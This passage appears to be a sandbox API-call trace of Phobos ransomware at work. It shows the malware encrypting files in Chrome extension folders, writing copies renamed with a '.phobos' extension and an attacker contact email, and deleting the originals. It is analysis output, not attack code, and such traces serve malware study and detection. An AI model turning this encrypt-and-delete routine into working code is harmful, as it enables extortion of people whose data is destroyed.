[0159.727] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0159.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.727] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11770) returned 1 [0159.727] CloseHandle (hObject=0x194) returned 1 [0159.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json")) returned 0x2020 [0159.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.728] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.728] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0159.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0159.869] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.869] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2dfa, lpOverlapped=0x0) returned 1 [0160.147] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2e00, dwBufLen=0x2e00 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2e00) returned 1 [0160.147] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2e00, lpOverlapped=0x0) returned 1 [0160.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.148] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.148] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0160.148] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.148] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0160.148] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.148] CloseHandle (hObject=0x194) returned 1 [0160.148] CloseHandle (hObject=0x17c) returned 1 [0160.148] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json")) returned 1 [0160.150] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.152] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=312) returned 1 [0160.152] CloseHandle (hObject=0x17c) returned 1 [0160.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json")) returned 0x2020 [0160.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.152] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.152] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.153] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.153] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.153] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x138, lpOverlapped=0x0) returned 1 [0160.154] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140, dwBufLen=0x140 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140) returned 1 [0160.154] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x140, lpOverlapped=0x0) returned 1 [0160.155] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.155] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.155] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.155] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.155] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.155] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.155] CloseHandle (hObject=0x17c) returned 1 [0160.155] CloseHandle (hObject=0x194) returned 1 [0160.155] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json")) returned 1 [0160.156] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.157] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=292) returned 1 [0160.157] CloseHandle (hObject=0x194) returned 1 [0160.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json")) returned 0x2020 [0160.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.158] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.158] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.158] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.158] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x124, lpOverlapped=0x0) returned 1 [0160.166] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130, dwBufLen=0x130 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130) returned 1 [0160.166] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x130, lpOverlapped=0x0) returned 1 [0160.167] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.167] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.167] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.167] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.167] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.168] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.168] CloseHandle (hObject=0x194) returned 1 [0160.168] CloseHandle (hObject=0x17c) returned 1 [0160.168] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json")) returned 1 [0160.168] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.170] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=254) returned 1 [0160.170] CloseHandle (hObject=0x17c) returned 1 [0160.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json")) returned 0x2020 [0160.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.170] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.170] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.195] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.195] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xfe, lpOverlapped=0x0) returned 1 [0160.196] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0160.196] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0160.196] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.196] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.196] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.197] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.197] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.197] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.197] CloseHandle (hObject=0x17c) returned 1 [0160.197] CloseHandle (hObject=0x194) returned 1 [0160.197] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json")) returned 1 [0160.198] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.198] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=249) returned 1 [0160.198] CloseHandle (hObject=0x194) returned 1 [0160.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json")) returned 0x2020 [0160.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js 